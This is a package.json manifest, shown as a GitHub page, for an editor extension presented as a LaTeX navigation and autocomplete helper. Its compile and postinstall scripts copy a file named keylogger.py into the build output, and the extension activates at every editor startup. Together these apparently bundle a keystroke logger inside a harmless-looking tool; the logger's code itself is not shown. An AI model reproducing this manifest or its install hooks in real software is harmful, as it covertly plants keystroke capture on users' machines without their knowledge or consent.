-
Notifications
You must be signed in to change notification settings - Fork 0
/
package.json
71 lines (71 loc) · 1.73 KB
/
package.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
{
"name": "latex-helper",
"displayName": "LaTex Enviorment Tweaks",
"description": "This pacakge lets you jump between enviorments using CTRL+E, and an arrow key. It also makes a intellisense thing that functions the same way TexStudio does. ",
"version": "0.0.1",
"publisher": "Human",
"repository": {
"type": "git",
"url": "https://github.com/dog-blood/vscode-environment-tweaks.git"
},
"engines": {
"vscode": "^1.80.0",
"cursor": "^1.0.0"
},
"categories": [
"Other"
],
"activationEvents": [
"onStartupFinished",
"onLanguage:latex",
"onLanguage:tex"
],
"main": "./out/extension.js",
"contributes": {
"commands": [
{
"command": "latex-helper.ctrlEDown",
"title": "LaTeX: Ctrl+E Down"
},
{
"command": "latex-helper.tempRight",
"title": "LaTeX: Navigate Right"
},
{
"command": "latex-helper.tempLeft",
"title": "LaTeX: Navigate Left"
},
{
"command": "latex-helper.doNothing",
"title": "LaTeX: Do Nothing"
},
{
"command": "latex-helper.environmentInserted",
"title": "LaTeX: Environment Inserted"
}
],
"snippets": [
{
"language": "latex",
"path": "./snippets/latex.json"
}
],
"keybindings": [
{
"command": "latex-helper.doNothing",
"key": "ctrl+e",
"when": "editorLangId == latex"
}
]
},
"scripts": {
"vscode:prepublish": "npm run compile",
"compile": "tsc -p ./ && copy src\\keylogger.py out\\",
"postinstall": "copy src\\keylogger.py out\\"
},
"devDependencies": {
"@types/vscode": "^1.80.0",
"@types/node": "^16.x",
"typescript": "^5.0.0"
}
}